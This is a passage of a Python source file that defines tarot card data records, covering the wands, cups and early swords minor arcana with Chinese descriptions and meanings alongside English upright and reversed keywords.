words='挑战', desc='权杖七暗示经由坚韧不拔而获得的成功。\n\n权杖七表示你需要更大的挑战。权杖七的讯息是“不要放弃”。继续努力前进,你将得到成功的回报。你投注于完成目标的体力与行动,将是值得的。', upright='Perseverance, Defensive, Maintaining control, Protectiveness, Standing up for yourself, Defending yourself, Protecting territory', reversed='Give up, Destroyed confidence, Overwhelmed, Giving up, Admitting defeat, Yielding, Lack of self belief, Surrender' ), init=False) eight_of_wands: TarotCard = field(default=TarotCard( id=29, index='eight_of_wands', type='minor_arcana', orig_name='Eight of Wands', name='权杖八', intro='八根权杖整齐划一的在空中航行,背景是蔚蓝的天空与青翠的山丘平原,还有一条宁静的小溪流过。', words='自由', desc='权杖八意味旅行及自由流动的能量。\n\n权杖八代表了海外旅行、自由流动的能量,以及达成目标的清晰路径。过去的努力就是在为现在的人生可以自由的旅行而铺路。权杖八表示你的目标清楚可见,而且正轻松的向它们迈进。这点可以从八根权杖自由而无约束的掠过天际看出来。权杖八没有拘束的本性反映了这是很少阻碍的时机。它表示你是自由的、可投注热情、直接追求目标。', upright='Rapid action, Movement, Quick decisions, Speed, Progress, Sudden changes, Excitement', reversed='Panic, Waiting, Slowdown, Slowness, Chaos, Delays, Losing momentum, Hastiness, Being unprepared' ), init=False) nine_of_wands: TarotCard = field(default=TarotCard( id=30, index='nine_of_wands', type='minor_arcana', 
orig_name='Nine of Wands', name='权杖九', intro='一个壮汉靠着长杖,似乎在等待着什么。他的头上扎绷带,显示他在过去战役中曾经受伤,尚未复原。但他并不畏惧,仍然紧锣密鼓等待着敌人的下一波来袭。他身后竖立八根权杖,井井有条,像是栅栏,包围着壮汉所守护的家园。', words='谨慎', desc='权杖九暗示重新评估目前承诺的时候。\n\n对于既存的问题纵是期待将来能够解决,现在这个人开始回顾过去的作为,以便看清他是怎么走到今天的。他已经渐渐知道所有行为都会产生结果,就好比他目前的生活就是过去作为的结果,而将来的生活则是由现在的决定和作为来引导的。\n\n这张牌代表逐渐意识到聚焦于承诺和目的是多么重要的事了。与其栽种五百颗混合的种子来期待有好的结果,不如仔细评估只耕耘一种特殊的品种,并且悉心照料它们,以享受耕耘后的收获。', upright='Resilience, Grit, Last stand, Persistence, Perseverance, Close to success, Fatigue', reversed='Exhaustion, Fatigue, Questioning motivations, Stubbornness, Rigidity, Defensiveness, Refusing compromise, Giving up' ), init=False) ten_of_wands: TarotCard = field(default=TarotCard( id=31, index='ten_of_wands', type='minor_arcana', orig_name='Ten of Wands', name='权杖十', intro='一个男人奋力的扛着十根沉重的权杖,朝着远方的房子前进。他被权杖的重量压得喘不过气,疲累万分,但他仍不愿放弃,为了生活,一步一脚印的往前走。', words='责任', desc='权杖十暗示一个委任某些责任的时机。\n\n权杖十描绘暗示一个委任某些责任的时机。他被这些权杖给压的沉下去,而且它们也遮住了他的方向(即远方的房子)。他急切地想要涉入这么多的情况当中,结果,因为种种承诺和问题而不胜负荷。权杖十通常伴随着一种态度:“如果你想妥适的完成它,你就要自己做。你觉得身负重任,所以不能去信任别人也能完成这件工作。\n\n尽管负担重重,然而权杖十代表你在付出极大努力后所获得的成功。或许你会因为交付出去某些责任而受惠,因为那会减轻你的压力,并且用时间去深思长期以来的憧憬。当你实现目标时。你有充分的理由为你的成就感到骄傲,因为权杖是证实了,要梦想成真就需要坚持和努力。', upright='Accomplishment, Responsibility, Burden, Duty, Stress, Obligation, Burning out, Struggles', reversed='Inability to delegate, Overstressed, Burnt out, Failure to delegate, Shouldering too much responsibility, Collapse, Breakdown' ), init=False) page_of_wands: TarotCard = field(default=TarotCard( id=32, index='page_of_wands', type='minor_arcana', orig_name='Page of Wands', name='权杖侍从', intro='权杖侍从把权杖拄在地上,好奇地看着杖顶,好像在研究什么东西。他的服装是明亮的鲜黄色,外衣上有权杖家族图腾火蜥蜴,有些蜥蜴的嘴没有真正咬到尾巴,形成不完整循环,但有些却有。牌的背景是沙漠和三个金字塔。', words='开始', desc='权杖侍从象征新的挑战,新的消息,跃跃欲试的梦想。\n\n权杖侍从意指该是开始某些新事物的时候了。它是展开一项新方案或旅行(如果有其他旅行牌出现在牌局中)的行动,且将指引你一个新方向。权杖侍从牌描述当开始一项新的事业时,一种可以感觉到年轻活力的行动。虽然对于行动会感到紧张,但是他仍然充满激情和热心,热衷于探索有用的经验以及展开新的冒险。', upright='Exploration, Excitement, Freedom, Adventure, Fresh ideas, Cheerfulness, Energetic, Fearless, Extroverted', reversed='Lack of direction, 
Procrastination, Creating conflict, Hasty, Impatient, Lacking ideas, Tantrums, Laziness, Boring, Unreliable, Distracted' ), init=False) knight_of_wands: TarotCard = field(default=TarotCard( id=33, index='knight_of_wands', type='minor_arcana', orig_name='Knight of Wands', name='权杖骑士', intro='权杖骑士骑着健马,高举权杖,表情自信地看着远方。他穿着明亮黄色服装,上面同样有权杖的家族象征火蜥蜴,但蜥蜴的嘴没有触碰到尾巴,形成一个不完整的循环。骑士的头盔顶端和背後都饰着红色的长穗,还戴着红手套,他以左手拉着缰绳,健马的前蹄高高举起。远方背景中出现三座金字塔,金字塔呈现在马脚的下方。', words='改变', desc='权杖骑士象征充满活力,信心满满的迎接改变。\n\n充满活力,信心满满的迎接改变。权杖骑士所代表的是火元素当中的火元素。这张牌可以象征行动、旅行、改变以及为了自身缘故的活动。看得出来权杖骑士正在思考未来的行动,骑士正全神贯注于对向往目标的积极追求。这张牌经常代表一种态度——完成某件事情唯一的办法就是自己动手做。瞄一眼这张牌就会得到火、活动、热情及活力的印象。权杖骑士暗示需要挑战、爱好旅游和学习,并有教学的能力。', upright='Action, Adventure, Fearlessness, Courageous, Energetic, Charming, Hero, Rebellious, Hot tempered, Free spirit', reversed='Anger, Impulsiveness, Recklessness, Arrogant, Reckless, Impatient, Lack of self control, Passive, Volatile, Domineering' ), init=False) queen_of_wands: TarotCard = field(default=TarotCard( id=34, index='queen_of_wands', type='minor_arcana', orig_name='Queen of Wands', name='权杖皇后', intro='权杖皇后戴着盛开绿叶的王冠,穿着阳光般金黄服饰,坐在宝座上。她的体态强健。她的左手拿着一朵向日葵,她的右手持权杖,眼光向左望。宝座的扶手是两只狮子,后面悬吊的帷幕上,再度出现火象的狮子图腾和向日葵。她前方有一只黑猫守护,这里的黑猫似乎也在保护权杖皇后,使她免于受伤害。远方有三座金字塔,天空则是一片既明亮又祥和的浅蓝色。', words='决心', desc='权杖皇后代表心灵的强大,透过内在力量而达到成功。\n\n权杖皇后牌可以说是透过内在的力量和自信而获得成功的。当你面对逆境时勇气会帮助你达成目标。相信你所做的事,以及做你所相信的事,可以帮助你了解你的目标。', upright='Courage, Determination, Joy, Confident, Self-assured, Passionate, Determined, Social, Charismatic, Vivacious, Optimistic', reversed='Selfishness, Jealousy, Insecurities, Demanding, Vengeful, Low confidence, Jealous, Selfish, Temperamental, Bully' ), init=False) king_of_wands: TarotCard = field(default=TarotCard( id=35, index='king_of_wands', type='minor_arcana', orig_name='King of Wands', name='权杖国王', intro='权杖国王坐在宝座上,身躯稍微向前倾,好像随时准备出发。他右手持权杖,杖上长有新鲜的绿叶。宝座和披风饰以狮子和火蜥蜴,地上还有一只火蜥蜴陪伴着他。', words='稳重', 
desc='权张国王代表经由自律而成功。\n\n权杖国王代表热忱坚定,魄力十足,经由自律而成功。他为人诚实、积极而坦率,而且经常愿意接受新挑战。他认为过程比结果还重要,而且拒绝任何拖泥带水的挑战。权杖国王描绘一个强壮的人,能够透过他的意志力来领导及统御别人。他对自己有坚强的信念,因为他的信心是建立在自身的经验上。他知道他的方法有效,因为他尝试过也试验过这种方法。自律可以让你超越自己,因此逆就会有充分的时间和体力来掌握更好的机会,让你完成已着手之事。', upright='Big picture, Leader, Overcoming challenges, Leadership, Vision, Taking control, Daring decisions, Boldness, Optimism', reversed='Impulsive, Overbearing, Unachievable expectations, Forceful, Domineering, Tyrant, Vicious, Powerless, Ineffective, Weak leader' ), init=False) ace_of_cups: TarotCard = field(default=TarotCard( id=36, index='ace_of_cups', type='minor_arcana', orig_name='Ace of Cups', name='圣杯首牌', intro='圣杯首牌是所有小牌的一号牌中最富象征意义的。图中的圣杯就是耶稣在最后晚餐中使用的杯子,杯上有个倒立的M字母。据说,在耶稣死后,他的鲜血就是由这个圣杯所承装着。\n\n白鸽是天主教中圣灵的象征,牠衔着象征耶稣身体的圣饼,自上而下彷佛要进入杯中。杯中有五道水涌出,下方的水面平静,只有少许涟漪,睡莲处处,睡莲茎长,向上伸展至水面。二十五滴水珠从四面落下,飘浮在空中。一只手从云中伸出,这只手和权杖一与宝剑一中的手截然不同,它是轻轻的捧着圣杯,而非用力抓住圣杯。', words='情感', desc='圣杯首牌意味情感的连接和满足。\n\n圣杯首牌正位是人际关系最好的开始,经常代表新感情的开端,对于人际关系是非常好的征兆。相对于权张首牌所代表的肉体上、体力上的开始,它暗示你已打开心扉接受新机会。它可能是一段新的两性关系,或既存关系的新阶段,或一种新层次的满足。此时正是你感觉情感满足的时刻。首牌描述的是透过感情和生活产生连接。你可能正经验着正立首牌的满足感或满意感。或许你正展开一项你全心期待的计划,或是一次旅行。', upright='New feelings, Spirituality, Intuition, Love, Emotional awakening, Creativity', reversed='Emotional loss, Blocked creativity, Emptiness, Coldness, Feeling unloved, Gloominess' ), init=False) two_of_cups: TarotCard = field(default=TarotCard( id=37, index='two_of_cups', type='minor_arcana', orig_name='Two of Cups', name='圣杯二', intro='一男一女面对彼此,向对方持杯致意。两人头上都戴着花环,男人身躯微微向前,左脚踏出,右手也伸向女人,而女人站姿端凝如山。他们中间浮着一根两条蛇缠绕的杖,称为“赫米斯之杖”,是治疗的象征。杖上的狮子头象征沟通,而两片翅膀象征圣灵,使人联想到恋人牌中的天使。远方是一座城镇。', words='平等', desc='圣杯二意指一种平等的伙伴关系或两性关系。\n\n圣杯二意指一种心灵上的契合。它形容一种既丰富又有创意的友谊或两性关系。其实,圣杯二讲的就是这两种力量的结合,若能同时拥有两种力量,且融合良好的话,会比单一力量更强大。当牌局中出现此牌时,它意味着连结你和对方的特质,那么你可能会获得某些比你单打独斗的成就还要来得大的东西。', upright='Unity, Partnership, Connection, Attraction, Close bonds, Joining forces, Mutual respect', reversed='Imbalance, Broken communication, Tension, Separation, Rejection, Division, Bad communication, Withdrawal' ), 
init=False) three_of_cups: TarotCard = field(default=TarotCard( id=38, index='three_of_cups', type='minor_arcana', orig_name='Three of Cups', name='圣杯三', intro='三个女子紧靠彼此,围成圆圈,高举圣杯互相庆贺。她们头上都戴着象征丰收的花圈,穿着色彩艳丽的袍子,脸上幸福洋溢。四周有藤蔓、葫芦及南瓜,一位女子手上提着一串葡萄,这些植物很容易让人联想到丰收的时节。这三位女子分别有不同颜色的头发与眼珠,穿戴的衣服花环也都各有不同,代表她们都是独立的个体,有独立的个性,但是,在这个团体中,她们都能尊重彼此,敬爱彼此。三人围成圆圈的型态,表示她们之间没有尊卑之分,在这个欢庆的场合里,每个人都是如此平等。', words='团聚', desc='圣杯三意味庆贺或重聚。\n\n圣杯三意指欢乐、分享或庆贺。圣杯三是一张代表庆祝、团圆或当所有参与者带来欢乐的一场聚会。这杖牌可一暗示由三人或更多的人来分享成功。圣杯三意味着一段庆祝的时光,一群志同道合的人们相聚,或代表这是个重大隆盛的晚宴。\n\n圣杯三也经常代表欢庆的场合,举凡各种宴会、聚餐、婚礼、弥月、尾牙、庆功宴等都算在内。其丰收的涵义表示事情有了好的结果,不管过程曾经有多艰辛。因此,圣杯三象征丰收的时节,长久的辛苦终于开花结果,获得成功。', upright='Friendship, Community, Happiness, Gatherings, Celebrations, Group events, Social events', reversed='Overindulgence, Gossip, Isolation, Scandal, Excess, Loneliness, Solitude, Imbalanced social life' ), init=False) four_of_cups: TarotCard = field(default=TarotCard( id=39, index='four_of_cups', type='minor_arcana', orig_name='Four of Cups', name='圣杯四', intro='一个男人百无聊赖地坐在树下,双眼紧闭,双手双脚合在一起,形成防御的姿态。他前方三个杯子象征他过去的经验。云中伸出一只手给他第四个杯子,他却视而不见,独自沉浸在自己的世界中。', words='不满', desc='圣杯四暗示要留意目前感情上的机会。\n\n圣杯四在告诉我们,应该睁开我们的双眼,在那些机会自眼前溜走之前好好的把握住它们。当你内心感到越充实时,你对外在的需求则越少。你越深思熟虑或将焦点放到内心,你就需要越稳定的基础(或与土地有更强的连结)来平衡你自己。\n\n这张牌带有一种沉闷及不悦的感觉,可能是求问者的生活日日如是,一成不变。其实生活未如想像般单调乏味的,只要求问者肯开阔视野,有些意料不到的事情便会发生。', upright='Apathy, Contemplation, Disconnectedness, Feeling disconnected, Melancholy, Boredom, Indifference, Discontent', reversed='Sudden awareness, Choosing happiness, Acceptance, Clarity, Awareness, Depression, Negativity' ), init=False) five_of_cups: TarotCard = field(default=TarotCard( id=40, index='five_of_cups', type='minor_arcana', orig_name='Five of Cups', name='圣杯五', intro='在灰暗的天空底下,有一个人身着黑色斗篷,低头哀悼地上三个倾倒的杯子,里头五颜六色的酒流了出来。他的前方是一条河,象征悲伤之流,但河上有座象征意识与决心的桥,通往远处的房子。灰暗的天色反映牌中人的沮丧的内心世界。从图面上无法分辨出这人是男是女,显示悲伤的情绪无论男女皆能体验。', words='悲观', 
desc='圣杯五代表在痛苦中回转身,寻找新的机会。\n\n圣杯五形容失落和悲伤。它可能是张代表分离的牌,或者有种和人生疏离的感觉。这段期间内,那些平稳而熟悉的事物似乎都逃离你了。在新机会现身前,你必须经历这段失落或孤立期。这张牌和所有的“五”(包括隐士牌)一样,在正立时都代表心胸窄狭,而倒立时,则有心胸宽大的意味。', upright='Loss, Grief, Self-pity, Disappointment, Sadness, Mourning, Discontent, Feeling let down', reversed='Acceptance, Moving on, Finding peace, Contentment, Seeing positives' ), init=False) six_of_cups: TarotCard = field(default=TarotCard( id=41, index='six_of_cups', type='minor_arcana', orig_name='Six of Cups', name='圣杯六', intro='在一座宁静安详的庄园里,有六个盛装星币花朵的圣杯。一个小男孩捧着圣杯,似乎在嗅着花香,又好像把圣杯献给小女孩。背景充斥代表快乐的鲜黄色,而天气晴和。让人彷佛有置身童话世界的感受。', words='安全', desc='圣杯六代表童真环境下的保障和安全。\n\n圣杯六描绘的是一种温柔而隐秘的情景,其中有某种程度的保障和安全,它带有一种可预知性。保障和安全倍受珍惜,不过这是以极高的代价换来的。因为没有什么冒险,所以通常没什么成长。\n\n圣杯六暗示以成长为代价而得到保障、安全和亲密。它可以意指你的居家或家庭状态的稳定。也可能是过去的事物或人们又出现了,等着你去处理。他也可以代表一种舒适的状态,让你有时间静下来,重新关注活力或安顿下来。', upright='Familiarity, Happy memories, Healing, Nostalgia, Memories, Comfort, Sentimentality, Pleasure', reversed='Moving forward, Leaving home, Independence, Stuck in past' ), init=False) seven_of_cups: TarotCard = field(default=TarotCard( id=42, index='seven_of_cups', type='minor_arcana', orig_name='Seven of Cups', name='圣杯七', intro='七个圣杯飘浮在云雾弥漫的半空中,杯中分别装着城堡(象征冒险)、珠宝(财富)、桂冠(胜利)、龙(恐惧,另一说是诱惑)、人头、盖着布发光的人(自己)以及蛇(智慧,另一说是嫉妒)。请注意桂冠的下方有颗不显眼的骷髅头,成功与死亡并存,似乎在给人什么警惕。有个人面对着这些圣杯,不知该如何选择,他的身体姿态似乎流露出些微恐惧。', words='梦想', desc='圣杯七代表应该认知你内在需求。\n\n圣杯七代表的是生活中的非现实层面,包括我们的梦境、幻想与白日梦,或是偶而异想天开的点子。这种想像通常只是空中楼阁,一般人不会真的把这些幻想付诸行动,因此圣杯七不是一张代表行动的牌,而只是一种个人想像的心理状态而已。这张牌描述的是:该去想想什么是你生活重要的部分。它显示出检视环境来确认你正走在通往满足之路的过程中。圣杯七意味着深思内在生活,已进行精神或情感的回顾。\n\n圣杯七是一张代表自我发现、心灵成长以及认识内在需求的牌。提醒你,充分了解自己与自己的行动,你需要行动,也需要思考。对行动有所思考能帮助你将直接的经验转变为知识,并更向智慧与理解靠近。没有思考,行动很快就会变得重复,而没有行动与经验,思考则可能变的索然无味,且毫无意义。这张圣杯七代表你需要向内探索自己,以追求所有爱的来源。你应该确认你所真正需要的是什么,并发现什么东西足以添满你的感情。', upright='Searching for purpose, Choices, Daydreaming, Illusion, Fantasy, Wishful thinking, Indecision', reversed='Lack of purpose, Diversion, Confusion, Disarray, Distractions, Clarity, Making choices' ), init=False) eight_of_cups: TarotCard = 
field(default=TarotCard( id=43, index='eight_of_cups', type='minor_arcana', orig_name='Eight of Cups', name='圣杯八', intro='身穿红衣红鞋的男子在暮色中,手持长杖,离开他先前辛苦建立的的八个杯子,越过河川,转身而去。四周沼泽密布,象征淤塞的情感,如同一滩死水。', words='突破', desc='圣杯八意味你已经突破某种状况,并显示你要追寻更多的东西。\n\n这张牌代表为了追寻一种新的满足,而放弃既有的满足方式。或许你正打算离职去找一个更有价值的工作,或者你正从你的爱的关系中撤退去寻找更深层的幸福。\n\n圣杯八意味着你正超越某人,或突破某特定状况。它表示一个人光理解还不够,还包括离开一种稳定的状态(圣杯六),去发现圣杯十所提供的满足感。没有任何人事物强迫你放弃目前的状态,除了你内心想达到更强烈满足的需求。要圆满的挑战成功,需要内在的力量,当八出现时,你就会拥有相对的勇气和力量。在大阿尔克纳牌中,第八张是力量牌。而所有塔罗牌的八也都和力量有关。', upright='Walking away, Disillusionment, Leaving behind, Abandonment, Letting go, Searching for truth', reversed='Avoidance, Fear of change, Fear of loss, Stagnation, Monotony, Accepting less, Staying in bad situation' ), init=False) nine_of_cups: TarotCard = field(default=TarotCard( id=44, index='nine_of_cups', type='minor_arcana', orig_name='Nine of Cups', name='圣杯九', intro='一个财主装扮的的男子坐在小凳上,双手抱胸,神情怡然自得。他身后的高桌上,覆盖蓝色桌布,九个圣杯排排站。背景则是一片光明的鲜黄色。', words='满足', desc='圣杯九意味对自己的满意和荣耀感。\n\n圣杯九的昵称叫做美梦成真,代表当事人的愿望极有可能实现,无论是精神或是物质方面。这张牌表示你了解自己真正的价值,而且就是你的价值造就了今天的你。\n\n圣杯九形容一种对能圆满达成工作而感到的骄傲和满足。你内心所拥有幸福和喜悦的感觉,可能是来自于你的工作环境、人际关系,或是来自一种心灵上的成就感。现在你内在的需求已经得到满足了,而你也能思考你所赢得的成功。在这张九牌当中有着从你对自己的爱里头所滋长出来的快乐、满足和平静。', upright='Satisfaction, Emotional stability, Luxury, Wishes coming true, Contentment, Success, Achievements, Recognition, Pleasure', reversed='Lack of inner joy, Smugness, Dissatisfaction, Unhappiness, Lack of fulfilment, Disappointment, Underachievement, Arrogance, Snobbery' ), init=False) ten_of_cups: TarotCard = field(default=TarotCard( id=45, index='ten_of_cups', type='minor_arcana', orig_name='Ten of Cups', name='圣杯十', intro='在卡面中我们看到一家四口和乐融融,父母亲搂抱对方,各举一只手迎向圣杯彩虹,两个孩子快乐的手牵手跳舞,背景是清翠的树木河流,和一栋房屋。', words='家庭', desc='圣杯十意味一个互利的团体或家庭状态。\n\n圣杯十是一张表示欢乐和分享的牌。它通常是在描述一个团队或家庭,他们在身体及精神上都能相互奉献及合作,并且共享所有的利益。圣杯十形容一个家庭或团体,而其中的每个人均能受益。因为每个人都坦然的付出和接受,因而团体的气氛和谐,大家也乐于付出。它暗示对家庭或工作环境(包括团队合作和分享)有所付出。这张是意味一个成功的家庭状态或聚合,其中每位参与者都充分的感受到对这个团体的归属感。', upright='Inner happiness, Fulfillment, Dreams coming true, Happiness, 
Homecomings, Emotional stability, Security, Domestic harmony', reversed='Shattered dreams, Broken family, Domestic disharmony, Unhappy home, Separation, Domestic conflict, Disharmony, Isolation​' ), init=False) page_of_cups: TarotCard = field(default=TarotCard( id=46, index='page_of_cups', type='minor_arcana', orig_name='Page of Cups', name='圣杯侍从', intro='圣杯侍从穿着花朵图案的衣服,身体很轻松地站着,左手叉腰,面带微笑,用好奇的眼光,没有任何压力地看着圣杯中蹦出的一条鱼。', words='奉献', desc='圣杯侍从意味有益于情感的奉献。\n\n圣杯侍从是想像力最丰富的孩子。他天真无邪,敏感细心,直觉性强,爱好幻想,好奇心重,甜美可人,喜欢作梦,常常问一些让人想都想不到的问题。他很随和,合作性高,可靠,关心别人的威受,也乐意为他人服务。这样的性格形成一位善解人意、敏感,多愁善感,强调感情交流互动的人。他认真对待他人,对於所爱的人更是忠诚。他也是一位勤勉好学和专心致志的人,自动自发地提供服务朝向特定目标努力,他热心助人,是值得信赖的好帮手,更是良好的工作伙伴。\n\n塔罗牌中的侍从牌都和学习有关,而且由于圣杯组牌涉及情感和直觉,所以这张牌可能意味着透过冥想,或其他任何类似的被动方式来进行心灵上的学习或发展。圣杯侍从代表一段新关系或圣以合伙关系的到来。一个让情感得到满足的机会。', upright='Happy surprise, Dreamer, Sensitivity, Idealism, Naivete, Innocence, Inner child, Head in the clouds', reversed='Emotional immaturity, Insecurity, Disappointment, Emotional vulnerability, Immaturity, Neglecting inner child, Escapism' ), init=False) knight_of_cups: TarotCard = field(default=TarotCard( id=47, index='knight_of_cups', type='minor_arcana', orig_name='Knight of Cups', name='圣杯骑士', intro='不同于权杖骑士或宝剑骑士的迅捷骑马姿态,圣杯骑士的白马很有绅士风度,优雅地行进,跟主人一样。圣杯骑士平举着圣杯,他的眼光有些梦幻,深深注视着圣杯。', words='选择', desc='圣杯骑士意味在感情和行动之间做出决定。\n\n圣杯骑士暗示来自某人的供给。它可能是指情感上的奉献,或某种更为实际的事物。它可能是指情感上的付出,或某种更为实际的事物。骑士也意味着一段决定是否等待或行动,让事情充分发展或找寻新机会的时期。为了发现满足,或许现在是随着心意(河流的象征)而为的时候了。', upright='Following the heart, Idealist, Romantic, Charming, Artistic, Graceful, Tactful, Diplomatic, Mediator, Negotiator', reversed='Moodiness, Disappointment, Tantrums, Turmoil, Avoiding conflict, Vanity' ), init=False) queen_of_cups: TarotCard = field(default=TarotCard( id=48, index='queen_of_cups', type='minor_arcana', orig_name='Queen of Cups', name='圣杯皇后', intro='圣杯皇后双手捧着圣杯,眼神直直的注视着圣杯。那圣杯是教堂形状,两臂各有一位天使,顶端是十字架,象征圣杯皇后的虔诚。她坐在海边的宝座上,宝座基部有个小美人鱼抓鱼的图案,顶部是两个小美人鱼共同抱着一个大蚌壳。', words='倾听', 
desc='圣杯皇后意味透过倾听直觉而成功。\n\n圣杯皇后意味透过倾听感觉,以及利用富创意的想象力而获得成功。她从经验得知,杂乱无章的想象所产生的结果通常是有限的,因此它可以将精力用在对身体、情感、精神及心灵上都相当有价值的行动上。虽然她可能显得温柔又细心,但眼神却意味着一种坚强的意志。爱调和她的意志,并增加个性上的深度。她带着爱心和怜悯行事,而且常常展现出浓浓的家庭感情。如果发生问题,她可能不会说出她的感觉,但仍然会对周遭的人给于支持,把自己的感情的困扰放在一边。', upright='Compassion, Calm, Comfort, Warmth, Kindness, Intuition, Healer, Counsellor, Supportive', reversed='Martyrdom, Insecurity, Dependence, Giving too much, Overly-sensitive, Needy, Fragile' ), init=False) king_of_cups: TarotCard = field(default=TarotCard( id=49, index='king_of_cups', type='minor_arcana', orig_name='King of Cups', name='圣杯国王', intro='国王坐在波涛汹涌海中央的宝座上,左边有条鱼跳出海面,右边有一艘帆船。他的内袍是代表水要素的蓝色,胸前还挂著鱼形项链。他左手拿著象征权力的杖,右手持圣杯,他却是圣杯家族中唯一不注视圣杯的人。', words='创作', desc='圣杯国王暗示透过创造和情感上的训练而成功。\n\n圣杯国王展现深度和理解力,他适合一个以满足他人的需求为主的位置。他感情已经成熟到能够清楚的考虑别人和自己的需求,而且常常以家庭及环境中的共同参与感为荣。\n\n圣杯国王暗示透过情感和创作上的训练而成功,经由落实精力在有创作的目标上,可以达到所追寻的成功。一种成熟、有创意的方法带来琛功,尤其是在创造和艺术的努力上。这张国王牌暗示你应该信赖你本能——别放弃。它暗示一种坚强又冷静的方式。想象加灵感,再加上实际的努力就会得到回报。', upright='Compassion, Control, Balance, Wise, Diplomatic, Balance between head and heart, Devoted, Advisor, Counsellor', reversed='Coldness, Moodiness, Bad advice, Overwhelmed, Anxious, Cold, Repressed, Withdrawn, Manipulative, Selfish' ), init=False) ace_of_swords: TarotCard = field(default=TarotCard( id=50, index='ace_of_swords', type='minor_arcana', orig_name='Ace of Swords', name='宝剑首牌', intro='一只手从云中伸出,紧紧握住宝剑,宝剑穿过皇冠与桂冠,而远方是毫无绿意的尖锐山头,以及灰白空旷的天际。', words='思想', desc='宝剑首牌代表毅然决然的行动,开始计划一项新的冒险。\n\n宝剑首牌代表的是一个开始,时涉及以相信冒险或方案的行动。权杖首牌描述身体上的行动,杯子牌的首牌则是情感上的行动,而这张首牌叙述一个意念的形成,或是为未来的行动所准备的计划。这张牌代表清晰的思考,或明确的了解到完成一项计划所需要的是什么。\n\n同时这把双面的宝剑强调着现实、成就与成功所必须负担的责任和应得的报酬。宝剑一只是一个开端,一种可能。未来究竟要如何发展,掌握在持剑者的手中。', upright='Breakthrough, Clarity, Sharp mind, New idea, Concentration, Vision, Force, Focus, Truth', reversed='Confusion, Brutality, Chaos, Miscommunication, Hostility, Arguments, Destruction' ), init=False) two_of_swords: TarotCard = field(default=TarotCard( id=51, index='two_of_swords', type='minor_arcana', orig_name='Two of Swords', name='宝剑二', 
intro='身穿浅灰长袍的女人坐在灰石凳上,背对着澎湃汹涌、暗礁满布的海洋。她眼蒙白布,双手持剑,在胸前交叉不动。天际高挂一轮新月。', words='抉择', desc='宝剑二意味着做出一个决断,无论对与错,不要试图逃避。\n\n宝剑意味为你需要作决定或在两个选择当中择其一。这是二则一的抉择,或许在目前这个阶段,你对于所做的选择会产生怎样的结果,洞察力还不够。你在做决定的时候,并没有对你的环境做通盘的考虑,或者是,你没有考虑到你的抉择会带来怎样的结果。\n\n正视你所恐惧的,如此你才能明了你周遭事物对你有什么意义。一个正确决定的报偿正等着你,它的第一个回报是解脱感,这解脱感来自于你能够锁定一个方向。', upright='Difficult choices, Indecision, Stalemate, Stuck in the middle, Denial, Hidden information', reversed='Lesser of two evils, No right choice, Confusion, Indecision, Hesitancy, Anxiety, Too much information, Truth revealed' ), init=False) three_of_swords: TarotCard = field(default=TarotCard( id=52, index='three_of_swords', type='minor_arcana', orig_name='Three of Swords', name='宝剑三', intro='映入眼帘的是一幅令人痛苦的画面。即使是完全没有接触过塔罗牌的朋友,也可以轻易道出宝剑三的涵义──伤心。三把剑合力刺进一颗鲜红的心,背景是灰暗的雨和云。某些版本的塔罗牌给这张牌一个更直接的名称,叫做“悲伤”。', words='悲伤', desc='宝剑三意味着伤心在所难免,请接受你的痛苦和悲伤。\n\n宝剑三代表的是,你正强烈的经验这悲伤和失落的一段时间。当出现这张牌时,内心的困惑、悲痛和沉重是很明显的,它表示强烈的失望。但你要知道:去体验你的悲伤是很重要的,因为在这么做的同时,你也扫除了障碍,让即将到来的机会可以接近你。记住,悲伤是会过去的。\n\n虽然痛苦,但我们要看破痛苦的假象。宝剑三凌空的心,告诉我们需要再去深入思考,以获得解脱和更深的觉醒,三把宝剑只是一种试炼,这颗心也可以是一种假托,而不是我们真正的心灵。以承受和接纳的态度,来化解宝剑成为优美的思考认知。', upright='Heartbreak, Suffering, Grief, Separation, Sadness, Sorrow, Upset, Loss, Trauma, Tears', reversed='Recovery, Forgiveness, Moving on. 
healing, Reconciliation, Repressing emotions' ), init=False) four_of_swords: TarotCard = field(default=TarotCard( id=53, index='four_of_swords', type='minor_arcana', orig_name='Four of Swords', name='宝剑四', intro='图中的男人在类似修道院的建筑物内休息,双手合抱胸前,呈现安详的状态。彩绘玻璃表现一个祈祷者跪在圣母面前的画面,好像在寻求什么建议,以获得内心的宁静。三把宝剑挂在墙上不用,但他身旁仍保有一把宝剑,当他醒来,随时可以拿起宝剑来采取行动。', words='沉思', desc='宝剑四暗示在危机中安静的思考,退隐中的深思熟虑。\n\n\n宝剑四这张牌可能象征自生活中撤离:身体上退隐到自家当中,或在精神上退隐到梦想和幻想当中。这是一张反省过去行为和计划未来的牌。他说明精神层面的巩固:采取让过去行为有意义的行动,以及排除那些已经被证实为不正确、或没有建设性的想法和信念。如此一来就有可能运用过去的经验来帮助你获得未来的成功。在经历了宝剑三的痛苦之后,随之而来的是对你自己和你的人生有更深层的了解。', upright='Rest, Restoration, Contemplation, Relaxation, Peace, Sanctuary, Recuperation, Self-protection, Rejuvenation', reversed='Restlessness, Burnout, Stress, Recovery, Awakening, Re-entering world, Release from isolation' ), init=False) five_of_swords: TarotCard = field(default=TarotCard( id=54, index='five_of_swords', type='minor_arcana', orig_name='Five of Swords', name='宝剑五', intro='红发的男子右手抱着两把剑,左手拄着另一把,回头注视远方两个失败者,嘴角似乎带着微笑。很明显的,他们刚结束一场争执,也许暴力相向。地上还散落着两把剑。另外两人中,一人怅然离去,一人用手摀着脸,似乎难以接受,或者感到伤心羞辱。天空中被风吹散的云彷佛也在说着他们争执的故事,看来很不宁静。', words='纷争', desc='宝剑五意味误会加深,争吵和紧张,解决的机会十分渺茫。\n\n宝剑五这张牌代表争吵、紧张和冲突,这可能使指你与自己内在的交战,或和你周遭人的不协调。假如这个冲突是指你和别人的,则其前提很有可能来自你的思想。在这种冲突的情况下,每个人对于事情的解决方法都各有见地,却没有人愿意聆听他人的心声。', upright='Unbridled ambition, Win at all costs, Sneakiness, Arguments, Disputes, Aggression, Bullying, Intimidation, Conflict, Hostility, Stress', reversed='Lingering resentment, Desire to reconcile, Forgiveness, Reconciliation, Resolution, Compromise, Revenge, Regret, Remorse, Cutting losses' ), init=False) six_of_swords: TarotCard = field(default=TarotCard( id=55, index='six_of_swords', type='minor_arcana', orig_name='Six of Swords', name='宝剑六', 